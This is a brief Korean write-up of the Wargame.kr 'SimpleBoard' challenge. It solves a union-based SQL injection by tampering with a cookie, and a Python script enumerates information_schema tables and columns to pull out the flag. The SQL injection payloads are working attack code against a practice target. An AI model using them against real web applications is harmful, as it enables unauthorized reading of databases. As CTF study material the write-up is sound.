Wargame.kr - SimpleBoard

Union based sqli 문제다

소스있지만 일단 글부터보면

http://wargame.kr:8080/SimpleBoard/read.php?idx=4

요런식으로 idx를 통해 글을 읽어오는 구조로 추측이 됩니다

여기서 소스를 봐야데는데 안보다가 소스보니까 쿠키를 조작해줬어야 헀었다.

cooki : view 에 url 인코딩한 /5 + union 구문넣고 url에도 넣고 하면 잘 되는것을 확인 가능함 

으앙 1개씩밖에 안보여서 limit 구문을 이용해서 python 돌려야...

import requests
import urllib
from bs4 import BeautifulSoup

def tables(i):
    query = "union select 1,2,3,table_name from information_schema.tables limit "+str(i)+",1#"
    cook = "%2F5%20"+urllib.quote(query)
    cookie = dict(view=cook)
    u = url+query
    print "[+]Pay : %s" %u
    re = requests.get(u, cookies=cookie)
    result = BeautifulSoup(re.text, 'lxml')
    for a in result.find_all("td"):
        print a
def columns(i):
    table = "README"
    query = "union select 1,2,3,column_name from information_schema.columns where table_name=0x524541444d45 limit "+str(i)+",1#"
    cook = "%2F5%20"+urllib.quote(query)
    cookie = dict(view=cook)
    u = url+query
    print "[+]Pay : %s" %u
    print "[+]Pay : %s" %cook
    re = requests.get(u, cookies=cookie)
    result = BeautifulSoup(re.text, 'lxml')
    print result
def guess():
    colum = "flag"
    query = "union select 1,2,3,flag from README#"
    cook = "%2F5%20"+urllib.quote(query)
    u = url+query
    cookie = dict(view=cook)
    re = requests.get(u, cookies=cookie)
    result = BeautifulSoup(re.text, 'lxml')
    print result

if __name__ == '__main__':
    url = "http://wargame.kr:8080/SimpleBoard/read.php?idx=5 "

guess()